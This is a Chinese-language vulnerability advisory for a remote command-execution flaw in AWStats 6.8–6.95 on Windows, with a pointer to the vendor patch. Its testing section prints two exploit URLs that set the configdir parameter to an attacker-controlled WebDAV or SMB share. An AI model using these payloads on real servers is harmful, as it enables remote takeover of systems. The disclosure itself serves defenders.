发布日期：2010-11-30
更新日期：2010-12-02

受影响系统：

AWStats AWStats 6.95
AWStats AWStats 6.9
AWStats AWStats 6.8

不受影响系统：

AWStats AWStats 7.0

描述：

---

BUGTRAQ  ID: 45123

AWStats是一款极为流行的基于Web的网站访问统计程序。

AWStats在特定运行环境下存在命令执行漏洞，远程攻击者可利用此漏洞在网络服务器进程中执行任意shell命令，从而控制系统。

在Microsoft Windows系统上，安装有Apache Tomcat时，AWStats就会出现远程命令执行漏洞。此问题源于Apache Tomcat在指定配置文件目录时处理“\\”的方式。

<*来源：StenoPlasma
  
  链接：http://marc.info/?l=full-disclosure&m=129123519021689&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

StenoPlasma 提供了如下测试方法：

Attacking Windows XP Apache Tomcat AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&amp;pluginmode=rawlog&amp;configdir=\\Attacker-IPAddress:80\webdav

Attacking Windows 2003 or Windows XP AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&amp;pluginmode=rawlog&amp;configdir=\\Attacker-IPAddress\SMB-Share

建议：

---

厂商补丁：

AWStats
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://awstats.sourceforge.net/

浏览次数：5054
严重程度：0（网友投票）